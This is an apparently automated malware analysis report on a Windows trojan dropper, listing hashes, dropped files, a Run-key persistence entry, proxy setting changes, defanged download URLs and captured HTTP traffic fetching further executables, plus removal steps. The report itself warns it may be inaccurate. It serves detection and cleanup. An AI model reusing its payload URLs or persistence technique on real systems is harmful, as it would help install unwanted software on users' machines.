Trojan.Win32.Agent.nezazd (Kaspersky), Gen:Variant.Zusy.224016 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0e79a1d33eb1d2beb44de83b00383f78
SHA1: 9a90b617307c1b4ec117d5d3a862bf227958d9e3
SHA256: aa0e234b7b43495cd2272d403f78bc60194c3219e1ecf861d1f28cf036a62624
SSDeep: 12288:7XwOrReFWQFe6hErRivAk/IpImWpzTXyVhRElM5VsA:7XwOrRsiMErRivAJSWVhWcVh
Size: 463415 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-31 02:38:51
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
setup.exe:4040
uc.exe:3972
Bind.exe:3680
%original file name%.exe:3844
setup.tmp:3412
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process setup.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (1423 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (0 bytes)
The process Bind.exe:3680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (1471609 bytes)
The process %original file name%.exe:3844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1288 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000 (0 bytes)
The process setup.tmp:3412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\fff.ini (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HK0TD.tmp (23961 bytes)
%Program Files%\fff\is-HIE46.tmp (673 bytes)
%Program Files%\fff\uc.exe (192 bytes)
%Program Files%\fff\is-6T2JC.tmp (601 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (0 bytes)
Registry activity
The process uc.exe:3972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe"
The process Bind.exe:3680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "80 5D F8 EC 75 9D D2 01"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "80 5D F8 EC 75 9D D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:3844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process setup.tmp:3412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"RegFilesHash" = "68 EB 27 85 4B 4C 47 E0 DF 55 83 6F 1B A4 1C D0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files%\fff\uc.exe, %Program Files%\fff\Bind.exe"
"SessionHash" = "A0 8F 16 97 54 36 AE EC A6 2F 93 7D AC 26 C8 7E"
"Owner" = "54 0D 00 00 BA 9D 21 E7 75 9D D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\RestartManager\Session0000]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
Dropped PE files
MD5 | File path |
---|---|
ec58caa0cb658e8958ece2811583c6c0 | c:\Program Files\fff\Bind.exe |
82e42e2a674a2d98e8688ef29696fdb4 | c:\Program Files\fff\uc.exe |
f13f028e99888a77e21c721961101339 | c:\Program Files\fff\unins000.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
setup.exe:4040
uc.exe:3972
Bind.exe:3680
%original file name%.exe:3844
setup.tmp:3412 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UH8JC.tmp\setup.tmp (1423 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_r_4728_(Build1702151518).exe (1471609 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (1288 bytes)
%Program Files%\fff\unins000.dat (1376 bytes)
%Program Files%\fff\fff.ini (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-N0E1M.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\fff\Bind.exe (73 bytes)
%Program Files%\fff\is-HK0TD.tmp (23961 bytes)
%Program Files%\fff\is-HIE46.tmp (673 bytes)
%Program Files%\fff\uc.exe (192 bytes)
%Program Files%\fff\is-6T2JC.tmp (601 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\fff\uc.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name: Oleg N. Scherbakov
Product Name: 7-Zip SFX
Product Version: 1.6.0.2712
Legal Copyright: Copyright (c) 2005-2012 Oleg N. Scherbakov
Legal Trademarks:
Original Filename: 7ZSfxMod_x86.exe
Internal Name: 7ZSfxMod
File Version: 1.6.0.2712
File Description: 7z Setup SFX (x86)
Comments:
Language: Language Neutral
Company Name: Oleg N. ScherbakovProduct Name: 7-Zip SFXProduct Version: 1.6.0.2712Legal Copyright: Copyright (c) 2005-2012 Oleg N. ScherbakovLegal Trademarks: Original Filename: 7ZSfxMod_x86.exeInternal Name: 7ZSfxModFile Version: 1.6.0.2712File Description: 7z Setup SFX (x86)Comments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 101854 | 101888 | 4.62608 | 0c04e49d78a3c453186c916e6f29540d |
.rdata | 106496 | 15306 | 15360 | 3.96022 | 1eff757b36a6b7a599236ac8b1b35b4d |
.data | 122880 | 19948 | 2560 | 3.08518 | 21d5c7a8ba54658b1e07909bf1045c79 |
.rsrc | 143360 | 6124 | 6144 | 2.63104 | 6cfc1356822af5f0acc53b008cf23f9b |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
5a212666f160fc40508f1bb3da9a0e4e
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.guoneizhu.com/ucni.txt | |
hxxp://www.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe | |
teredo.ipv6.microsoft.com | 157.56.120.207 |
dns.msftncsi.com | 131.107.255.255 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ucni.txt HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 13 Mar 2017 11:20:02 GMT
Accept-Ranges: bytes
ETag: "d5a67fc2eb9bd21:0"
Server: Microsoft-IIS/10.0
Date: Wed, 15 Mar 2017 10:21:03 GMT
Content-Length: 334
hXXp://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe..hXXp://VVV.guoneizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe..hXXps://res05.bignox.com/s3group/M00/2017/1/16/c9ce6fdbe0c8474580a2ed9c3688c372.exe c9ce6fdbe0c8474580a2ed9c3688c372.exe..HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Mon, 13 Mar 2017 11:20:02 GMT..Accept-Ranges: bytes..ETag: "d5a67fc2eb9bd21:0"..Server: Microsoft-IIS/10.0..Date: Wed, 15 Mar 2017 10:21:03 GMT..Content-Length: 334..http://VVV.guoneizhu.com/Browser_V6.0.1471.913_r_4728_(Build1702151518).exe Browser_V6.0.1471.913_r_4728_(Build1702151518).exe..hXXp://VVV.guoneizhu.com/FlowSpritSetup_slnt_5011.exe FlowSpritSetup_slnt_5011.exe..hXXps://res05.bignox.com/s3group/M00/2017/1/16/c9ce6fdbe0c8474580a2ed9c3688c372.exe c9ce6fdbe0c8474580a2ed9c3688c372.exe......
GET /Browser_V6.0.1471.913_r_4728_(Build1702151518).exe HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 21 Feb 2017 14:15:23 GMT
Accept-Ranges: bytes
ETag: "6f2ddcf04c8cd21:0"
Server: Microsoft-IIS/10.0
Date: Wed, 15 Mar 2017 10:21:04 GMT
Content-Length: 51179792
MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......]....o...o...o....]..o...._..o....^.;o...6...o....k..o..w4...o..w4..Xo..w4..[o....X..o..w2...o....C.>o...o...m...4..Xo...4...o...4..]o...4...o...4S..o...o;..o...4...o..Rich.o..........................PE..L...Y..X..................................... ....@..........................P..........................................Y.......T......................../.......n..@...T...............................@............................................text...I........................... ..`.data...<e... ......................@....idata...,...........&..............@..@.gfids..(............T..............@..@.tls.................X..............@....rsrc................Z..............@..@.reloc...n.......p...R..............@..B..........................................................................................................................................................................A.......J...A...A...A...A...A...A...A...A...A...A...A...A.3.A.'.A.?.A.Z.A.u.A...A...A.p.A...........J...J...J.)JK.mhL...L.o.L......... .E...........L...L..KK.................{.6.5.1.2.2.C.B.0.-.E.A.0.F.-.4.7.D.F.-.A.9.5.3.-.0.1.7.1.7.0.E.D.1.2.F.9.}.....{.4.e.a.1.6.a.c.7.-.f.d.5.a.-.4.7.c.3.-.8.7.5.b.-.d.b.f.4.a.2.0.0.8.c.2.0.}.....{.8.B.A.9.8.6.D.A.-.5.1.0.0.-.4.0.5.E.-.A.A.3.5.-.8.6.F.3.4.A.0.2.A.C.B.F.}.....{.4.D.C.8.B.4.C.A.-.1.B.D.A.-.4.8.3.e.-.B.5.F.A.-.D.3.C.1.2.E.1.5.B.6.2.D.}.......E.-.-.c.
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
uc.exe_3972:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegOpenKeyW
RegOpenKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
GetCPInfo
GetCPInfo
%s\*.*
%s\*.*
%s\%s
%s\%s
@.reloc
@.reloc
GetProcessWindowStation
GetProcessWindowStation
"%/28;=#$019:>?
"%/28;=#$019:>?
ÂmgM
ÂmgM
zcÃ
zcÃ
1 1@1`1|1
1 1@1`1|1
8 8$80848
8 8$80848
%Program Files%\fff\uc.exe
%Program Files%\fff\uc.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\aa.lnk
\aa.lnk
Chrome_WidgetWin_1
Chrome_WidgetWin_1
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
C:\Users\Public\Desktop\
C:\Users\Public\Desktop\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
%s\Internet Explorer\iexplore.exe
%s\Internet Explorer\iexplore.exe
http\shell\open\command
http\shell\open\command
qqbrowser.exe
qqbrowser.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
%s\UCBrowser.exe
%s\UCBrowser.exe
mscoree.dll
mscoree.dll
@KERNEL32.DLL
@KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
index.dat
index.dat
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
InstallerSuccessLaunchCmdLine
InstallerSuccessLaunchCmdLine
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
\UUC0789.exe
\UUC0789.exe
uc.exe
uc.exe
1, 0, 0, 1
1, 0, 0, 1
Bind.exe_3680:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoA
HttpQueryInfoA
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
GET%sHTTP/1.1
GET%sHTTP/1.1
Range: bytes=%d-
Range: bytes=%d-
%Program Files%\fff\Bind.exe
%Program Files%\fff\Bind.exe
Bind.exe
Bind.exe
1, 0, 0, 1
1, 0, 0, 1
msctls_hotkey32
msctls_hotkey32
HotKey1
HotKey1